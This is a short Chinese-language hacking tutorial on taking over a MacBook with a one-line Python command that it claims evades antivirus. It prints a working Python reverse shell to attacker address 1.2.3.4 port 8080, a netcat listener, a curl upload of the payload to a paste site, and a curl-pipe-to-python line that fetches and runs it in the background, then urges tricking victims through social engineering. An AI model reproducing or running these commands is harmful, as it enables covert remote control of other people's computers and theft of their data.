使用一個Python命令在5秒內繞過殺毒軟體並控制macOS

使用一個Python命令在5秒內繞過殺毒軟件並控制macOS

一直以來,人們都認為macOS比Windows操作系統更安全。本文我們只需一個小命令,黑客就可以完全接管MacBook並遠程控制它。

目前世界各地都在運行的大量Windows計算機。這使得開發利用windows漏洞的黑客遠比macOS多。 因此,儘管macOS可能同樣脆弱,但圍繞Windows的漏洞新聞更多。

當涉及到Mac pwning時,單線有效載荷只是創建一個MacBook連接,允許攻擊者遠程運行命令。 一位經驗豐富的Python編碼人員可以輕鬆組成一個複雜的腳本來洩露敏感數據,實時錄製通過麥克風的音頻,流式傳輸桌面並窺探目標,或者自動執行各種攻擊後攻擊。

本文我們將使用一個單行的python命令,來破解macOS,並且可以躲避殺毒軟件。以下這行命令能夠創建一個後門程序

import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("1.2.3.4",8080));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/bash","-i"]);

此Python命令不會被標macOS防火牆或防病毒軟件標記為可疑程序,因為Python不是病毒。 Python是macOS操作系統內置的幾種技術之一,就像為Windows管理員設計的合法工具PowerShell一樣。

下面我們通過模擬的方式來講解如何利用這條命令

  • 啟動Netcat服務器,設置Netcat監聽端口為8080。
nc -l -p 8080
  • 然後,將下面的Python代碼保存為一個名為payload.py的文件。 可以使用nano或默認文本編輯器來完成。
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("1.2.3.4",8080));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/bash","-i"]);'
  • 如果該命令在vps或者遠程MacBook上運行,請將攻擊者的IP地址(1.2.3.4)更改為服務器IP。 如果攻擊者系統與MacBook位於同一Wi-Fi網絡的本地網絡,使用攻擊者的本地IP地址(例如192.168.1.18)可以訪問Netcat。 端口號(8080)可以更改為1024和65535之間的任何值。
  • 上傳攻擊數據到Pastebin,將Python代碼上傳到Pastebin。 我比較喜歡Pb,因為域名非常短,並且可以手動命名這些數據。 例如,如果我想上傳剛剛的Python腳本,我會使用下面的cURL命令。
cat payload.py | curl -F c=@- https://ptpb.pw/~PasteNameHere
使用一個Python命令在5秒內繞過殺毒軟件並控制macOS

  • 下面我們就可以使用十分簡短的命令來攻擊macbook。
curl ptpb.pw/~PasteNameHere | python - &
  • 以上的cURL命令將下載包含Python代碼並作為後臺進程執行

至此已經完成了攻擊前的一切準備,具體如何誘導macbook執行以上命令,這才是最難的。需要發揮你們的聰明才智,或者利用社會工程學誘騙用戶執行。


分享到:


相關文章: